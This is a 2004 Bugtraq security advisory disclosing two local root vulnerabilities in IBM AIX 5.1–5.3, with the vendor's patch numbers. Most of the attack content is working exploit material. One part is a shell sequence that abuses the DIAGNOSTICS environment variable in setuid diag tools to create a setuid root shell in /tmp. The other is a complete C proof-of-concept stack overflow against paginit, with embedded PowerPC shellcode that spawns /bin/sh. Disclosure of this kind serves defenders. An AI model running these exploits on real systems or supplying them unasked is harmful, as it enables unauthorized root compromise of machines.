Date: Mon, 20 Dec 2004 12:10:41 +0100
From: cees-bart <ceesb@...ru.nl>
To: bugtraq@...urityfocus.com
Subject: AIX 5.1/5.2/5.3 local root exploits


hi,

i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 
(unix for IBM RS/6000 powerpc).

1) the first is a bug in all setuid diag related tools that use an 
environment variable as a prefix to an external binary executed as root.

2) the second is a classical stack overflow in a tool called paginit.

status: vendor contacted, patches are available:

1) for the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and 
IY64277(5.3).
2) for the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), 
and IY64312(5.3).

bug descriptions below.

regards,
cees-bart
phd student @ university of nijmegen

---

bug 1:

there are (at least) 4 broken suid binaries.

-r-sr-xr-x   1 root     system        10014 Sep 16 2002  /usr/sbin/lsmcode
-r-sr-x---   1 root     system         2796 Jan 26 2003  /usr/sbin/diag_exec
-r-sr-xr-x   1 root     system       450433 Apr 08 2004  /usr/sbin/invscout
-r-sr-xr-x   1 root     system       511362 Apr 08 2004  /usr/sbin/invscoutd

all these binaries are exploited the same way: the path set in the 
$DIAGNOSTICS environment variable is used by these binaries to execute 
$DIAGNOSTICS/bin/Dctrl as root (duh).

for example, executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

bug 2:

the following setuid binary:

-r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit

does not do a bounds check on the first commandline argument, which is 
supposed to be a username.
if you feed paginit the proper data and hit enter, root privileges are 
gained.

POC exploit code:

/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb@...ru.nl>
*/

#include <string.h>   /* memset, memcpy */
#include <unistd.h>   /* execle */

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

/* store x at buf in big-endian order (PowerPC byte order) */
void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];   /* environment string: label, landing zone, shellcode */
  char buf[8000];    /* oversized first argument (the "username") */
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);

  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel, sizeof(envlabel)-1);
  // landingzone: the shellcode's first instruction repeated, so RETADDR
  // can land anywhere in it and fall through into the shellcode
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
  code[sizeof(code)-1] = 0;

  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0;

  p = buf;
  p += 4114;
  printint(p, RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
  return 1; /* only reached if execle failed */
}